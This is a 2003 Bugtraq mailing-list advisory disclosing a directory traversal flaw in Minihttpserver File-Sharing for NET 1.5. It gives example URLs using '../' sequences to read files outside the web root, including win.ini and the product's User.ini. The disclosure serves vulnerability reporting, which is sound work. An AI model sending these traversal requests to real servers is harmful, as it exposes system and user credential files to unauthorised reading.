Bugtraq mailing list archives
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
From: Bahaa Naamneh <b_naamneh () hotmail com>
Date: 3 Oct 2003 13:14:28 -0000
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability Affected Systems: File-Sharing for NET version: 1.5 (and possibly earlier versions) Vendor: Minihttpserver - http://www.minihttpserver.net Issue: Directory Traversal Vulnerability Released: 2 October 2003 Introduction: ============= "File Sharing for net is a complete, secure web server that shares your business documents and files over the web: remote users only need browsers to view your files. Share, transfer files securely with colleagues." - Vendors Description [ http://www.minihttpserver.net ] Details: ======== File-Sharing for NET has a Directory Traversal Vulnerability Using the string '../' or '..\' in a URL, an attacker can gain read access to any file outside of the intended web-published file system directory. http://[target]/../../../existing_file http://[target]\..\..\..\existing_file Examples: --------- http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini http://127.0.0.1/../../../windows/win.ini Vendor status: ============== The vendor has been informed, and they are fixing this bug. The updated version, when released, can be downloaded from: http://www.minihttpserver.net/fbbs.zip Discovered by/Credit: ===================== Bahaa Naamneh b_naamneh () hotmail com http://www.bsecurity.tk
Current thread:
- Minihttpserver File-Sharing for NET Directory Traversal Vulnerability Bahaa Naamneh (Oct 03)